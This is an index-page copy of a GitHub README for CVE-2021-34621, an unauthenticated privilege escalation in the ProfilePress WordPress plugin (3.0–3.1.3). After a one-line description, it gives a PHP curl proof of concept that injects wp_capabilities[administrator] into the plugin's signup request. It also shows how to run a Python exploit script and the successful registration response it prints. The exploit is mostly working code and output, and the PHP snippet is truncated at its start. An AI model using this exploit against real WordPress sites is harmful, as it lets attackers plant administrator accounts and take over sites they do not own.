Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/randomrobbiebf/cve-2021-34621

ProfilePress 3.0 - 3.1.3 - Unauthenticated Privilege Escalation
https://github.com/randomrobbiebf/cve-2021-34621

Last synced: about 1 month ago
JSON representation

ProfilePress 3.0 - 3.1.3 - Unauthenticated Privilege Escalation

Awesome Lists containing this project

README

        

# CVE-2021-34621
ProfilePress 3.0 - 3.1.3 - Unauthenticated Privilege Escalation

# Description
The user registration functionality of the plugin allowed arbitrary user meta to be supplied, including wp_capabilities, during registration which made it possible for users to register as an administrator.

# POC
```

'Hax0r',
'reg_email' => '[email protected]',
'reg_password' => 'password',
'reg_password_present' => 'true',
'reg_first_name' => 'Hax0r',
'reg_last_name' => 'Hax0r',
'wp_capabilities[administrator]' => '1',
'action' => 'pp_ajax_signup',
'melange_id' => ''

]);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);
```

Script Usage
---

```
$ python3 CVE-2021-34621.py --url http://wordpress.lan --username test2 --email [email protected] --password test
{"message":"

Registration successful.<\/div>"}
```